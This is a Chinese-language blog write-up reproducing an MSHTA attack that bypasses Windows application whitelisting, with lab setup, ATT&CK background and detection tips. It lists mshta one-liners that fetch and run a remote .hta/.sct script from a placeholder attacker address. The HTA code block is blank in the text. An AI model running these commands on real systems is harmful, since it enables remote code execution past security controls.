MSHTA命令执行——绕过应用白名单限制

最近复现了一个MSHTA命令执行的攻击，这里做个记录。

所需环境

这里使用了两台互相联通的电脑分别作为攻击机和靶机。

攻击机

Windows 10
phpstudy

靶机

Windows 10
powershell

背景&技术介绍

假设攻击者已经控制了一台内网主机，但是该主机存在应用白名单限制，因此，尝试通过MSHTA程序绕过限制。

百度百科对MSHTA简介如下：

mshta一般指mshta.exe。mshta.exe是微软Windows操作系统相关程序，英文全称Microsoft HTML Application，可翻译为微软超文本标记语言应用，用于执行.HTA文件。

百度百科对HTA的简介如下：

HTA是HTML Application的缩写（HTML应用程序），是软件开发的新概念，直接将HTML保存成HTA的格式，就是一个独立的应用软件，与VB、C++等程序语言所设计的软件界面没什么差别。
HTA虽然用HTML、JS和CSS编写，却比普通网页权限大得多。它具有桌面程序的所有权限（读写文件、操作注册表等）。HTA本来就是被设计为桌面程序的。

而ATT&CK官网对该技术的原理说明如下：

攻击者可能会通过受信任的 Windows 实用程序滥用 mshta.exe 来代理恶意 .hta 文件和 Javascript 或 VBScript 的执行。
Mshta.exe 是一种执行 Microsoft HTML 应用程序 (HTA) 文件的实用程序。 HTA 是使用与 Internet Explorer 相同的模型和技术执行的独立应用程序，但在浏览器之外。
Mshta.exe 可用于绕过不考虑其潜在用途的应用程序控制解决方案。由于 mshta.exe 在 Internet Explorer 的安全上下文之外执行，因此它还可绕过浏览器安全设置。

大概总结一下，该技术的原理为：

MSHTA是Windows内置的一个程序，主要用于执行HTA程序
MSHTA可以直接执行远端的HTA
HTA程序可以包括VBScript、JScript等代码，以此执行命令
通过MSHTA运行HTA程序执行命令的方式，可以加载本地受限应用，以此绕过应用白名单限制
MSHTA在浏览器外部运行，因此也可绕过浏览器安全设置

攻击实施

编写恶意HTA程序

首先，编写恶意的HTA程序，保存为m.hta，hta文件内容如下：




 

    Nothing to see here..

HTA程序本质上是一个类似HTML的程序，但其中可以嵌入VBScript代码。
这里嵌入了一段VBScript代码，定义了一个程序，程序第一行创建一个shell对象，第二行利用该对象运行计算器程序（当然，VBScript能做的不仅仅是这些，这里只是以计算器做一个例子，如果想要实施更加复杂的攻击，将第二行的命令换成想要执行的shell脚本即可）

HTA还可以嵌入JScript脚本，因此，上面的程序也可以写成下面这样，但注意，需要保存为m.sct：

其实现的功能和前一个文件一样，但这里是使用JScript建立一个ActiveX对象，再通过该对象运行命令

上线恶意程序

文件编写完毕之后，需要将其上线以方便后续攻击。

这里直接安装phpstudy，去官网下载傻瓜式安装即可，安装完毕后，会在安装目录下有一个www文件夹，将我们刚刚编写的恶意程序放进去即可。

然后打开phpstudy，启动所有服务，完成程序上线。

在靶机上运行命令

进入到靶机中，打开powershell，运行以下命令（其中的攻击机地址可以是IP或者域名）：

mshta.exe http://攻击机地址/m.hta

或者命令：

/cmd /c mshta.exe javascript:a=(GetObject("script:http://攻击机地址/m.sct")).Exec();close();

或者命令：

mshta vbscript:Close(Execute("GetObject(""script:https[:]//攻击机地址/m[.]sct"")"))

攻击完成

攻击效果

可以看到，命令运行后，靶机电脑上的计算器程序就直接启动运行了：
（图后面再补）

如果将恶意的HTA程序中的脚本换成其他命令，则可以实施更加复杂且危险的攻击。

预防措施

在ATT&CK中也给出了一定的预防措施：

使用进程监控来监控 mshta.exe 的执行和参数。在命令行中查找执行原始或混淆脚本的 mshta.exe。将最近对 mshta.exe 的调用与已知良好参数和已执行的 .hta 文件的先前历史进行比较，以确定异常和潜在的对抗活动。在 mshta.exe 调用之前和之后使用的命令参数也可能有助于确定正在执行的 .hta 文件的来源和目的。

监视 HTA 文件的使用。如果它们通常不在环境中使用，则它们的执行可能是可疑的

参考资料

MSHTA教程
ATT&CK关于MSHTA的介绍